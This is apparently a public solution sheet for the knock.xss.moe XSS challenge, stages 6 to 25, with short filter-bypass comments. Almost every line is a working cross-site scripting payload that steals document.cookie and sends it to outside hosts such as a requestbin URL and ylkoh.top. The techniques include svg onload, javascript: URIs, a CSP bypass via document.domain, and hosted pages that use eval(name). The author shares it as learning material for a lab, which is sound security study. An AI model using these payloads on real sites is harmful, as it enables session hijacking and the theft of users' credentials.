{} = placeholder for the URL of the request-viewing endpoint, substituted into the payloads below
Stage 6 /?q=</xmp><img+src=1+onerror=location.href='{}?'+document.cookie>
Stage 7 /?q=%27%20onfocus=location.href=%27{}?%27%2Bdocument.cookie;%20autofocus=%27%27 #なんでautofocusに値を入れないと実行されないでしょう?
Stage 8 /?q=%27onfocus=location.href=%27{}?%27%2Bdocument.cookie;%20autofocus=%27%27
Stage 9
/?q=XSS%20onfocus=location={}?
%2bdocument.cookie%20autofocus
Stage 10
/?q=javascript:onerror=location={}?
%2bdocument.cookie
Stage 11
/?q=javascript:onerror=location={}?
%2bdocument.cookie
Stage 12
?q=javascript:onerror=top.location={}?
%2bdocument.cookie
Stage 13 ?q= //document.cookie, window.sessionStorage and window.localStorage are being censored //their base64 versions, e.g. atob('ZG9jdW1lbnQuY29va2ll'), are also being censored
Stage 14 #Set document.domain self to bypass CSP + append payload (parent.document.cookie is important because you want the first URL's cookie) ?q=//8293927d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe/?document.domain=%27knock.xss.moe%27;top.location.href=%27http://requestbin.net/r/17yvn3e1?%27+encodeURIComponent(parent.document.cookie)
Stage 15 #Add script tag, no CSP ?q=%3Cscript%3Etop.location.href=%27http://requestbin.net/r/17yvn3e1?%27%2Bparent.document.cookie%3C/script%3E
Stage 16 ?q=javascript:top.location.href=%27http://requestbin.net/r/17yvn3e1?%27%2Bparent.document.cookie
Stage 17 ?q=javascript:top.location.href='http://requestbin.net/r/17yvn3e1?'%2Bparent.document.cookie
Stage 18
#Escaping the quotes enclosing the URL didn't work
?q=');top.location.href=http://requestbin.net/r/17yvn3e1?
%2Bdocument.cookie//
Stage 19
#alert('Hello',1,alert(0)) <- put the payload in the argument list so the second alert executes before the first one (arguments are evaluated before the outer call)
?q=%27,1,window.open(http://requestbin.net/r/17yvn3e1?
%2Bdocument.cookie));//
Stage 20
#The <script> tag is being filtered; use svg onload etc. instead.
?q=<svg onload=javascript:location.href=http://requestbin.net/r/17yvn3e1?
%2Bdocument.cookie>
Stage 21 Same as Stage 20
Stage 22
#Use a short domain name
?q=%3Csvg%20onload=javascript:location=//ylkoh.top?
%2Bdocument.cookie%3E
Stage 23
#Shorter!
?q=%3Csvg onload=location=//ylkoh.top?
%2Bdocument.cookie%3E
Stage 24
#Shorter!! (put payload on hosted page)
?q=<svg onload=location=//ylkoh.top/x.html
>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body >
<img src='#' onerror=window.open('http://ylkoh.top?'%2Bdocument.cookie) />;
</body>
</html>
<script>
name = "location.href='http://ylkoh.top?'+document.cookie";
location.href = "http://1498f071159fd60222c0e7e82b7b6ff046e9e52e.knock.xss.moe/?q=%3Csvg/onload=eval(name)%3E";
</script>
Stage 25 #Host this payload externally and enter the link directly into the submission box http://ylkoh.top/x
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body >
<img src='#' onerror=window.open('http://ylkoh.top?'%2Bdocument.cookie) />;
</body>
</html>
<script>
name = "location.href='http://ylkoh.top?'+document.cookie";
location.href = "http://8e67e39d7e01213d5551c696ef8641b625cc8dd7.knock.xss.moe/?q=%3Csvg/onload=eval(name)%3E";
</script>
Just made this public, as it helped me learn a lot about XSS.